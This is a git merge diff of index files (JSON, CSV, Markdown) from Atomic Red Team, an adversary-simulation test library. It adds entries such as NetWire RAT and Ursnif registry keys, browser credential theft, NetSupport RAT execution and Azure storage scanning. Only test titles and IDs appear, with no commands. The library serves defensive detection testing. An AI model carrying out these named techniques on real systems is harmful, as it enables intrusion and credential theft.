Merge branch 'master' into T1222.002

atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json

@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}

atomics/Indexes/Indexes-CSV/index.csv

@@ -201,6 +201,11 @@ defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003
 defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
 defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
 defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
 defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
@@ -218,6 +223,7 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
 defense-evasion,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
 defense-evasion,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
 defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
 defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
@@ -804,6 +810,7 @@ collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShe
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
 collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
 collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
+collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
 collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -903,6 +910,7 @@ credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn
 credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
 credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
 credential-access,T1555.003,Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
+credential-access,T1555.003,Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -1073,6 +1081,7 @@ discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bca
 discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
 discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
 discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
+discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
 discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
@@ -1155,7 +1164,7 @@ discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers
 discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
 discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
 discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
@@ -1185,6 +1194,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
 command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -96,6 +96,7 @@ collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28f
 collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
 collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
 collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
+collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
 collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -217,6 +218,7 @@ discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad
 discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
 discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
 discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
+discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
@@ -234,7 +236,7 @@ discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db26
 discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -156,7 +156,7 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
 discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -151,6 +151,11 @@ defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003
 defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
 defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
 defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
 defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
@@ -159,6 +164,7 @@ defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b
 defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
 defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
 defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
 defense-evasion,T1562.006,Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
 defense-evasion,T1562.006,Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
@@ -647,6 +653,7 @@ credential-access,T1555.003,Credentials from Web Browsers,10,Stage Popular Crede
 credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
 credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
 credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
+credential-access,T1555.003,Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
@@ -860,6 +867,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
 command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -276,6 +276,11 @@
   - Atomic Test #36: Disable Windows Security Center Notifications [windows]
   - Atomic Test #37: Suppress Win Defender Notifications [windows]
   - Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
+  - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
+  - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
+  - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
+  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
+  - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
 - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
@@ -310,6 +315,7 @@
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
   - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
 - T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1388,6 +1394,7 @@
   - Atomic Test #4: Collect Clipboard Data via VBA [windows]
 - [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
   - Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
+  - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
 - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
@@ -1575,6 +1582,7 @@
   - Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
   - Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
   - Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
+  - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
@@ -1804,6 +1812,7 @@
   - Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
   - Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
   - Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
+  - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
   - Atomic Test #1: List Process Main Windows - C# .NET [windows]
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1995,6 +2004,7 @@
   - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
   - Atomic Test #6: Ammyy Admin Software Execution [windows]
   - Atomic Test #7: RemotePC Software Execution [windows]
+  - Atomic Test #8: NetSupport - RAT Execution [windows]
 - T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -224,6 +224,7 @@
 - T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
   - Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
+  - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
 - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
@@ -556,6 +557,7 @@
   - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
   - Atomic Test #7: Hostname Discovery [linux, macos]
   - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
+  - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -209,6 +209,11 @@
   - Atomic Test #36: Disable Windows Security Center Notifications [windows]
   - Atomic Test #37: Suppress Win Defender Notifications [windows]
   - Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
+  - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
+  - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
+  - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
+  - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
+  - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
 - T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.001 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -231,6 +236,7 @@
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
   - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+  - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
 - T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1142,6 +1148,7 @@
   - Atomic Test #11: WinPwn - BrowserPwn [windows]
   - Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
   - Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
+  - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
 - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
   - Atomic Test #1: Private Keys [windows]
@@ -1440,6 +1447,7 @@
   - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
   - Atomic Test #6: Ammyy Admin Software Execution [windows]
